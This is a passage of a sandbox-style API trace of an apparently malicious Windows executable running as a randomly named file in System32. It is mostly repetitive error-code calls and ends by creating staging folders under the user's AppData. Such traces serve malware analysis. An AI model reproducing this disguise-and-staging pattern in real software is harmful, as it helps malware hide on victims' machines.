¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x26f0e8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0036.770] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x26f79c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x04*îõÔú&", lpUsedDefaultChar=0x0) returned 256 [0036.770] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0036.770] GetLastError () returned 0x0 [0036.771] SetLastError (dwErrCode=0x0) [0036.771] GetLastError () returned 0x0 [0036.771] SetLastError (dwErrCode=0x0) [0036.771] GetLastError () returned 0x0 [0036.771] SetLastError (dwErrCode=0x0) [0036.771] GetLastError () returned 0x0 [0036.771] SetLastError (dwErrCode=0x0) [0036.771] GetLastError () returned 0x0 [0036.771] SetLastError (dwErrCode=0x0) [0036.771] GetLastError () returned 0x0 [0036.771] SetLastError (dwErrCode=0x0) [0036.771] GetLastError () returned 0x0 [0036.771] SetLastError (dwErrCode=0x0) [0036.771] GetLastError () returned 0x0 [0036.771] SetLastError (dwErrCode=0x0) [0036.771] GetLastError () returned 0x0 [0036.771] SetLastError (dwErrCode=0x0) [0036.771] GetLastError () returned 0x0 [0036.771] SetLastError (dwErrCode=0x0) [0036.771] GetLastError () returned 0x0 [0036.771] SetLastError (dwErrCode=0x0) [0036.771] GetLastError () returned 0x0 [0036.771] SetLastError (dwErrCode=0x0) [0036.771] GetLastError () returned 0x0 [0036.771] SetLastError (dwErrCode=0x0) [0036.771] GetLastError () returned 0x0 [0036.771] SetLastError (dwErrCode=0x0) [0036.771] GetLastError () returned 0x0 [0036.771] SetLastError (dwErrCode=0x0) [0036.771] GetLastError () returned 0x0 [0036.771] SetLastError (dwErrCode=0x0) [0036.771] GetLastError () returned 0x0 [0036.771] SetLastError (dwErrCode=0x0) [0036.771] GetLastError () returned 0x0 [0036.772] SetLastError (dwErrCode=0x0) [0036.772] GetLastError () returned 0x0 [0036.772] SetLastError (dwErrCode=0x0) [0036.772] GetLastError () returned 0x0 [0036.772] SetLastError (dwErrCode=0x0) [0036.772] GetLastError () returned 0x0 [0036.772] SetLastError (dwErrCode=0x0) [0036.772] GetLastError () returned 0x0 [0036.772] SetLastError (dwErrCode=0x0) [0036.772] GetLastError () returned 0x0 [0036.772] SetLastError (dwErrCode=0x0) [0036.772] GetLastError () returned 0x0 [0036.772] SetLastError (dwErrCode=0x0) [0036.772] GetLastError () returned 0x0 [0036.772] SetLastError (dwErrCode=0x0) [0036.772] GetLastError () returned 0x0 [0036.772] SetLastError (dwErrCode=0x0) [0036.772] GetLastError () returned 0x0 [0036.772] SetLastError (dwErrCode=0x0) [0036.772] GetLastError () returned 0x0 [0036.772] SetLastError (dwErrCode=0x0) [0036.772] GetLastError () returned 0x0 [0036.772] SetLastError (dwErrCode=0x0) [0036.772] GetLastError () returned 0x0 [0036.772] SetLastError (dwErrCode=0x0) [0036.772] GetLastError () returned 0x0 [0036.772] SetLastError (dwErrCode=0x0) [0036.772] GetLastError () returned 0x0 [0036.772] SetLastError (dwErrCode=0x0) [0036.772] GetLastError () returned 0x0 [0036.772] SetLastError (dwErrCode=0x0) [0036.772] GetLastError () returned 0x0 [0036.773] SetLastError (dwErrCode=0x0) [0036.773] GetLastError () returned 0x0 [0036.773] SetLastError (dwErrCode=0x0) [0036.773] GetLastError () returned 0x0 [0036.773] SetLastError (dwErrCode=0x0) [0036.773] GetLastError () returned 0x0 [0036.773] SetLastError (dwErrCode=0x0) [0036.773] GetLastError () returned 0x0 [0036.773] SetLastError (dwErrCode=0x0) [0036.773] GetLastError () returned 0x0 [0036.773] SetLastError (dwErrCode=0x0) [0036.773] GetLastError () returned 0x0 [0036.773] SetLastError (dwErrCode=0x0) [0036.773] GetLastError () returned 0x0 [0036.773] SetLastError (dwErrCode=0x0) [0036.773] GetLastError () returned 0x0 [0036.773] SetLastError (dwErrCode=0x0) [0036.773] GetLastError () returned 0x0 [0036.773] SetLastError (dwErrCode=0x0) [0036.773] GetLastError () returned 0x0 [0036.773] SetLastError (dwErrCode=0x0) [0036.773] GetLastError () returned 0x0 [0036.773] SetLastError (dwErrCode=0x0) [0036.773] GetLastError () returned 0x0 [0036.773] SetLastError (dwErrCode=0x0) [0036.773] GetLastError () returned 0x0 [0036.773] SetLastError (dwErrCode=0x0) [0036.773] GetLastError () returned 0x0 [0036.773] SetLastError (dwErrCode=0x0) [0036.773] GetLastError () returned 0x0 [0036.773] SetLastError (dwErrCode=0x0) [0036.773] GetLastError () returned 0x0 [0036.773] SetLastError (dwErrCode=0x0) [0036.773] GetLastError () returned 0x0 [0036.774] SetLastError (dwErrCode=0x0) [0036.774] GetLastError () returned 0x0 [0036.774] SetLastError (dwErrCode=0x0) [0036.774] GetLastError () returned 0x0 [0036.774] SetLastError (dwErrCode=0x0) [0036.774] GetLastError () returned 0x0 [0036.774] SetLastError (dwErrCode=0x0) [0036.774] GetLastError () returned 0x0 [0036.774] SetLastError (dwErrCode=0x0) [0036.774] GetLastError () returned 0x0 [0036.774] SetLastError (dwErrCode=0x0) [0036.774] GetLastError () returned 0x0 [0036.774] SetLastError (dwErrCode=0x0) [0036.774] GetLastError () returned 0x0 [0036.774] SetLastError (dwErrCode=0x0) [0036.774] GetLastError () returned 0x0 [0036.774] SetLastError (dwErrCode=0x0) [0036.774] GetLastError () returned 0x0 [0036.774] SetLastError (dwErrCode=0x0) [0036.774] GetLastError () returned 0x0 [0036.774] SetLastError (dwErrCode=0x0) [0036.774] GetLastError () returned 0x0 [0036.774] SetLastError (dwErrCode=0x0) [0036.774] GetLastError () returned 0x0 [0036.774] SetLastError (dwErrCode=0x0) [0036.774] GetLastError () returned 0x0 [0036.774] SetLastError (dwErrCode=0x0) [0036.774] GetLastError () returned 0x0 [0036.774] SetLastError (dwErrCode=0x0) [0036.774] GetLastError () returned 0x0 [0036.774] SetLastError (dwErrCode=0x0) [0036.774] GetLastError () returned 0x0 [0036.774] SetLastError (dwErrCode=0x0) [0036.774] GetLastError () returned 0x0 [0036.774] SetLastError (dwErrCode=0x0) [0036.775] GetLastError () returned 0x0 [0036.775] SetLastError (dwErrCode=0x0) [0036.775] GetLastError () returned 0x0 [0036.775] SetLastError (dwErrCode=0x0) [0036.775] GetLastError () returned 0x0 [0036.775] SetLastError (dwErrCode=0x0) [0036.775] GetLastError () returned 0x0 [0036.775] SetLastError (dwErrCode=0x0) [0036.775] GetLastError () returned 0x0 [0036.775] SetLastError (dwErrCode=0x0) [0036.775] GetLastError () returned 0x0 [0036.775] SetLastError (dwErrCode=0x0) [0036.775] GetLastError () returned 0x0 [0036.775] SetLastError (dwErrCode=0x0) [0036.775] GetLastError () returned 0x0 [0036.775] SetLastError (dwErrCode=0x0) [0036.775] GetLastError () returned 0x0 [0036.775] SetLastError (dwErrCode=0x0) [0036.775] GetLastError () returned 0x0 [0036.775] SetLastError (dwErrCode=0x0) [0036.775] GetLastError () returned 0x0 [0036.775] SetLastError (dwErrCode=0x0) [0036.775] GetLastError () returned 0x0 [0036.775] SetLastError (dwErrCode=0x0) [0036.775] GetLastError () returned 0x0 [0036.775] SetLastError (dwErrCode=0x0) [0036.775] GetLastError () returned 0x0 [0036.775] SetLastError (dwErrCode=0x0) [0036.775] GetLastError () returned 0x0 [0036.776] SetLastError (dwErrCode=0x0) [0036.776] GetLastError () returned 0x0 [0036.776] SetLastError (dwErrCode=0x0) [0036.776] GetLastError () returned 0x0 [0036.776] SetLastError (dwErrCode=0x0) [0036.776] GetLastError () returned 0x0 [0036.776] SetLastError (dwErrCode=0x0) [0036.776] GetLastError () returned 0x0 [0036.776] SetLastError (dwErrCode=0x0) [0036.776] GetLastError () returned 0x0 [0036.776] SetLastError (dwErrCode=0x0) [0036.776] GetLastError () returned 0x0 [0036.776] SetLastError (dwErrCode=0x0) [0036.776] GetLastError () returned 0x0 [0036.776] SetLastError (dwErrCode=0x0) [0036.776] GetLastError () returned 0x0 [0036.776] SetLastError (dwErrCode=0x0) [0036.776] GetLastError () returned 0x0 [0036.776] SetLastError (dwErrCode=0x0) [0036.776] GetLastError () returned 0x0 [0036.776] SetLastError (dwErrCode=0x0) [0036.776] GetLastError () returned 0x0 [0036.776] SetLastError (dwErrCode=0x0) [0036.776] GetLastError () returned 0x0 [0036.776] SetLastError (dwErrCode=0x0) [0036.776] GetLastError () returned 0x0 [0036.777] SetLastError (dwErrCode=0x0) [0036.777] GetLastError () returned 0x0 [0036.777] SetLastError (dwErrCode=0x0) [0036.777] GetLastError () returned 0x0 [0036.777] SetLastError (dwErrCode=0x0) [0036.777] GetLastError () returned 0x0 [0036.777] SetLastError (dwErrCode=0x0) [0036.777] GetLastError () returned 0x0 [0036.777] SetLastError (dwErrCode=0x0) [0036.777] GetLastError () returned 0x0 [0036.777] SetLastError (dwErrCode=0x0) [0036.777] GetLastError () returned 0x0 [0036.777] SetLastError (dwErrCode=0x0) [0036.777] GetLastError () returned 0x0 [0036.777] SetLastError (dwErrCode=0x0) [0036.777] GetLastError () returned 0x0 [0036.777] SetLastError (dwErrCode=0x0) [0036.777] GetLastError () returned 0x0 [0036.777] SetLastError (dwErrCode=0x0) [0036.777] GetLastError () returned 0x0 [0036.777] SetLastError (dwErrCode=0x0) [0036.777] GetLastError () returned 0x0 [0036.777] SetLastError (dwErrCode=0x0) [0036.777] GetLastError () returned 0x0 [0036.777] SetLastError (dwErrCode=0x0) [0036.777] GetLastError () returned 0x0 [0036.778] SetLastError (dwErrCode=0x0) [0036.778] GetLastError () returned 0x0 [0036.778] SetLastError (dwErrCode=0x0) [0036.778] GetLastError () returned 0x0 [0036.778] SetLastError (dwErrCode=0x0) [0036.778] GetLastError () returned 0x0 [0036.778] SetLastError (dwErrCode=0x0) [0036.778] GetLastError () returned 0x0 [0036.778] SetLastError (dwErrCode=0x0) [0036.778] GetLastError () returned 0x0 [0036.778] SetLastError (dwErrCode=0x0) [0036.778] GetLastError () returned 0x0 [0036.778] SetLastError (dwErrCode=0x0) [0036.778] GetLastError () returned 0x0 [0036.778] SetLastError (dwErrCode=0x0) [0036.778] GetLastError () returned 0x0 [0036.778] SetLastError (dwErrCode=0x0) [0036.778] GetLastError () returned 0x0 [0036.778] SetLastError (dwErrCode=0x0) [0036.778] GetLastError () returned 0x0 [0036.778] SetLastError (dwErrCode=0x0) [0036.778] GetLastError () returned 0x0 [0036.778] SetLastError (dwErrCode=0x0) [0036.778] GetLastError () returned 0x0 [0036.778] SetLastError (dwErrCode=0x0) [0036.778] GetLastError () returned 0x0 [0036.779] SetLastError (dwErrCode=0x0) [0036.779] GetLastError () returned 0x0 [0036.779] SetLastError (dwErrCode=0x0) [0036.779] GetLastError () returned 0x0 [0036.779] SetLastError (dwErrCode=0x0) [0036.779] GetLastError () returned 0x0 [0036.779] SetLastError (dwErrCode=0x0) [0036.779] GetLastError () returned 0x0 [0036.779] SetLastError (dwErrCode=0x0) [0036.779] GetLastError () returned 0x0 [0036.779] SetLastError (dwErrCode=0x0) [0036.779] GetLastError () returned 0x0 [0036.779] SetLastError (dwErrCode=0x0) [0036.779] GetLastError () returned 0x0 [0036.779] SetLastError (dwErrCode=0x0) [0036.779] GetLastError () returned 0x0 [0036.779] SetLastError (dwErrCode=0x0) [0036.779] GetLastError () returned 0x0 [0036.779] SetLastError (dwErrCode=0x0) [0036.779] GetLastError () returned 0x0 [0036.779] SetLastError (dwErrCode=0x0) [0036.779] GetLastError () returned 0x0 [0036.779] SetLastError (dwErrCode=0x0) [0036.779] GetLastError () returned 0x0 [0036.779] SetLastError (dwErrCode=0x0) [0036.779] GetLastError () returned 0x0 [0036.780] SetLastError (dwErrCode=0x0) [0036.780] GetLastError () returned 0x0 [0036.780] SetLastError (dwErrCode=0x0) [0036.780] GetLastError () returned 0x0 [0036.780] SetLastError (dwErrCode=0x0) [0036.780] GetLastError () returned 0x0 [0036.780] SetLastError (dwErrCode=0x0) [0036.780] GetLastError () returned 0x0 [0036.780] SetLastError (dwErrCode=0x0) [0036.780] GetLastError () returned 0x0 [0036.780] SetLastError (dwErrCode=0x0) [0036.780] GetLastError () returned 0x0 [0036.780] SetLastError (dwErrCode=0x0) [0036.780] GetLastError () returned 0x0 [0036.780] SetLastError (dwErrCode=0x0) [0036.780] GetLastError () returned 0x0 [0036.780] SetLastError (dwErrCode=0x0) [0036.780] GetLastError () returned 0x0 [0036.780] SetLastError (dwErrCode=0x0) [0036.780] GetLastError () returned 0x0 [0036.780] SetLastError (dwErrCode=0x0) [0036.780] GetLastError () returned 0x0 [0036.780] SetLastError (dwErrCode=0x0) [0036.780] GetLastError () returned 0x0 [0036.780] SetLastError (dwErrCode=0x0) [0036.780] GetLastError () returned 0x0 [0036.781] SetLastError (dwErrCode=0x0) [0036.781] GetLastError () returned 0x0 [0036.781] SetLastError (dwErrCode=0x0) [0036.781] GetLastError () returned 0x0 [0036.781] SetLastError (dwErrCode=0x0) [0036.781] GetLastError () returned 0x0 [0036.781] SetLastError (dwErrCode=0x0) [0036.781] GetLastError () returned 0x0 [0036.781] SetLastError (dwErrCode=0x0) [0036.781] GetLastError () returned 0x0 [0036.781] SetLastError (dwErrCode=0x0) [0036.781] GetLastError () returned 0x0 [0036.781] SetLastError (dwErrCode=0x0) [0036.781] GetLastError () returned 0x0 [0036.781] SetLastError (dwErrCode=0x0) [0036.781] GetLastError () returned 0x0 [0036.781] SetLastError (dwErrCode=0x0) [0036.781] GetLastError () returned 0x0 [0036.781] SetLastError (dwErrCode=0x0) [0036.781] GetLastError () returned 0x0 [0036.781] SetLastError (dwErrCode=0x0) [0036.781] GetLastError () returned 0x0 [0036.781] SetLastError (dwErrCode=0x0) [0036.781] GetLastError () returned 0x0 [0036.781] SetLastError (dwErrCode=0x0) [0036.781] GetLastError () returned 0x0 [0036.781] SetLastError (dwErrCode=0x0) [0036.782] GetLastError () returned 0x0 [0036.782] SetLastError (dwErrCode=0x0) [0036.782] GetLastError () returned 0x0 [0036.782] SetLastError (dwErrCode=0x0) [0036.782] GetLastError () returned 0x0 [0036.782] SetLastError (dwErrCode=0x0) [0036.782] GetLastError () returned 0x0 [0036.782] SetLastError (dwErrCode=0x0) [0036.782] GetLastError () returned 0x0 [0036.782] SetLastError (dwErrCode=0x0) [0036.782] GetLastError () returned 0x0 [0036.782] SetLastError (dwErrCode=0x0) [0036.782] GetLastError () returned 0x0 [0036.782] SetLastError (dwErrCode=0x0) [0036.782] GetLastError () returned 0x0 [0036.782] SetLastError (dwErrCode=0x0) [0036.782] GetLastError () returned 0x0 [0036.782] SetLastError (dwErrCode=0x0) [0036.782] GetLastError () returned 0x0 [0036.782] SetLastError (dwErrCode=0x0) [0036.782] GetLastError () returned 0x0 [0036.782] SetLastError (dwErrCode=0x0) [0036.782] GetLastError () returned 0x0 [0036.782] SetLastError (dwErrCode=0x0) [0036.782] GetLastError () returned 0x0 [0036.782] SetLastError (dwErrCode=0x0) [0036.783] GetLastError () returned 0x0 [0036.783] SetLastError (dwErrCode=0x0) [0036.783] GetLastError () returned 0x0 [0036.783] SetLastError (dwErrCode=0x0) [0036.783] GetLastError () returned 0x0 [0036.783] SetLastError (dwErrCode=0x0) [0036.783] GetLastError () returned 0x0 [0036.783] SetLastError (dwErrCode=0x0) [0036.783] GetLastError () returned 0x0 [0036.783] SetLastError (dwErrCode=0x0) [0036.783] GetLastError () returned 0x0 [0036.783] SetLastError (dwErrCode=0x0) [0036.783] GetLastError () returned 0x0 [0036.783] SetLastError (dwErrCode=0x0) [0036.783] GetLastError () returned 0x0 [0036.783] SetLastError (dwErrCode=0x0) [0036.783] GetLastError () returned 0x0 [0036.783] SetLastError (dwErrCode=0x0) [0036.783] GetLastError () returned 0x0 [0036.783] SetLastError (dwErrCode=0x0) [0036.783] GetLastError () returned 0x0 [0036.783] SetLastError (dwErrCode=0x0) [0036.783] GetLastError () returned 0x0 [0036.783] SetLastError (dwErrCode=0x0) [0036.783] GetLastError () returned 0x0 [0036.783] SetLastError (dwErrCode=0x0) [0036.783] GetLastError () returned 0x0 [0036.784] SetLastError (dwErrCode=0x0) [0036.784] GetLastError () returned 0x0 [0036.784] SetLastError (dwErrCode=0x0) [0036.818] GetLastError () returned 0x0 [0036.818] SetLastError (dwErrCode=0x0) [0036.818] GetLastError () returned 0x0 [0036.818] SetLastError (dwErrCode=0x0) [0036.818] GetLastError () returned 0x0 [0036.818] SetLastError (dwErrCode=0x0) [0036.818] GetLastError () returned 0x0 [0036.818] SetLastError (dwErrCode=0x0) [0036.818] GetLastError () returned 0x0 [0036.818] SetLastError (dwErrCode=0x0) [0036.818] GetLastError () returned 0x0 [0036.818] SetLastError (dwErrCode=0x0) [0036.818] GetLastError () returned 0x0 [0036.818] SetLastError (dwErrCode=0x0) [0036.818] GetLastError () returned 0x0 [0036.819] SetLastError (dwErrCode=0x0) [0036.819] GetLastError () returned 0x0 [0036.819] SetLastError (dwErrCode=0x0) [0036.819] GetLastError () returned 0x0 [0036.819] SetLastError (dwErrCode=0x0) [0036.819] GetLastError () returned 0x0 [0036.819] SetLastError (dwErrCode=0x0) [0036.819] GetLastError () returned 0x0 [0036.819] SetLastError (dwErrCode=0x0) [0036.819] GetLastError () returned 0x0 [0036.819] SetLastError (dwErrCode=0x0) [0036.819] GetLastError () returned 0x0 [0036.819] SetLastError (dwErrCode=0x0) [0036.819] GetLastError () returned 0x0 [0036.819] SetLastError (dwErrCode=0x0) [0036.819] GetLastError () returned 0x0 [0036.819] SetLastError (dwErrCode=0x0) [0036.819] GetLastError () returned 0x0 [0036.819] SetLastError (dwErrCode=0x0) [0036.819] GetLastError () returned 0x0 [0036.819] SetLastError (dwErrCode=0x0) [0036.819] GetLastError () returned 0x0 [0036.819] SetLastError (dwErrCode=0x0) [0036.819] GetLastError () returned 0x0 [0036.819] SetLastError (dwErrCode=0x0) [0036.819] GetLastError () returned 0x0 [0036.820] SetLastError (dwErrCode=0x0) [0036.820] GetLastError () returned 0x0 [0036.820] SetLastError (dwErrCode=0x0) [0036.820] GetLastError () returned 0x0 [0036.820] SetLastError (dwErrCode=0x0) [0036.820] GetLastError () returned 0x0 [0036.820] SetLastError (dwErrCode=0x0) [0036.820] GetLastError () returned 0x0 [0036.820] SetLastError (dwErrCode=0x0) [0036.820] GetLastError () returned 0x0 [0036.820] SetLastError (dwErrCode=0x0) [0036.820] GetLastError () returned 0x0 [0036.820] SetLastError (dwErrCode=0x0) [0036.820] GetLastError () returned 0x0 [0036.820] SetLastError (dwErrCode=0x0) [0036.820] GetLastError () returned 0x0 [0036.820] SetLastError (dwErrCode=0x0) [0036.820] GetLastError () returned 0x0 [0036.820] SetLastError (dwErrCode=0x0) [0036.820] GetLastError () returned 0x0 [0036.820] SetLastError (dwErrCode=0x0) [0036.820] GetLastError () returned 0x0 [0036.820] SetLastError (dwErrCode=0x0) [0036.820] GetLastError () returned 0x0 [0036.820] SetLastError (dwErrCode=0x0) [0036.820] GetLastError () returned 0x0 [0036.821] SetLastError (dwErrCode=0x0) [0036.821] GetLastError () returned 0x0 [0036.821] SetLastError (dwErrCode=0x0) [0036.821] GetLastError () returned 0x0 [0036.821] SetLastError (dwErrCode=0x0) [0036.821] GetLastError () returned 0x0 [0036.821] SetLastError (dwErrCode=0x0) [0036.821] GetLastError () returned 0x0 [0036.821] SetLastError (dwErrCode=0x0) [0036.821] GetLastError () returned 0x0 [0036.821] SetLastError (dwErrCode=0x0) [0036.821] GetLastError () returned 0x0 [0036.821] SetLastError (dwErrCode=0x0) [0036.821] GetLastError () returned 0x0 [0036.821] SetLastError (dwErrCode=0x0) [0036.821] GetLastError () returned 0x0 [0036.821] SetLastError (dwErrCode=0x0) [0036.821] GetLastError () returned 0x0 [0036.821] SetLastError (dwErrCode=0x0) [0036.821] GetLastError () returned 0x0 [0036.821] SetLastError (dwErrCode=0x0) [0036.821] GetLastError () returned 0x0 [0036.821] SetLastError (dwErrCode=0x0) [0036.821] GetLastError () returned 0x0 [0036.821] SetLastError (dwErrCode=0x0) [0036.821] GetLastError () returned 0x0 [0036.821] SetLastError (dwErrCode=0x0) [0036.821] GetLastError () returned 0x0 [0036.821] SetLastError (dwErrCode=0x0) [0036.821] GetLastError () returned 0x0 [0036.822] SetLastError (dwErrCode=0x0) [0036.822] GetLastError () returned 0x0 [0036.822] SetLastError (dwErrCode=0x0) [0036.822] GetLastError () returned 0x0 [0036.822] SetLastError (dwErrCode=0x0) [0036.822] GetLastError () returned 0x0 [0036.822] SetLastError (dwErrCode=0x0) [0036.822] GetLastError () returned 0x0 [0036.822] SetLastError (dwErrCode=0x0) [0036.822] GetLastError () returned 0x0 [0036.822] SetLastError (dwErrCode=0x0) [0036.822] GetLastError () returned 0x0 [0036.822] SetLastError (dwErrCode=0x0) [0036.822] GetLastError () returned 0x0 [0036.822] SetLastError (dwErrCode=0x0) [0036.822] GetLastError () returned 0x0 [0036.822] SetLastError (dwErrCode=0x0) [0036.823] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0036.823] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0036.823] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0036.824] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fb18 | out: lpSystemTimeAsFileTime=0x26fb18*(dwLowDateTime=0xe3a23570, dwHighDateTime=0x1d3dfba)) [0036.824] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x26fa50, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0036.824] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x26f938, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0036.824] GetLastError () returned 0x0 [0036.824] GetLastError () returned 0x0 [0036.824] GetLastError () returned 0x0 [0036.824] GetLastError () returned 0x0 [0036.824] GetLastError () returned 0x0 [0036.824] GetLastError () returned 0x0 [0036.825] GetLastError () returned 0x0 [0036.825] GetLastError () returned 0x0 [0036.825] GetLastError () returned 0x0 [0036.825] GetLastError () returned 0x0 [0036.825] GetLastError () returned 0x0 [0036.825] GetLastError () returned 0x0 [0036.825] GetLastError () returned 0x0 [0036.825] GetLastError () returned 0x0 [0036.825] GetLastError () returned 0x0 [0036.825] GetLastError () returned 0x0 [0036.825] GetLastError () returned 0x0 [0036.825] GetLastError () returned 0x0 [0036.825] GetLastError () returned 0x0 [0036.825] GetSystemDirectoryA (in: lpBuffer=0x72f1e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0036.826] wsprintfA (in: param_1=0x72f1e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0036.826] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0036.826] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0036.826] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0036.826] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0036.826] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0036.826] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0036.826] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0036.826] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0036.826] GetLastError () returned 0xb7 [0036.826] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0036.826] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | 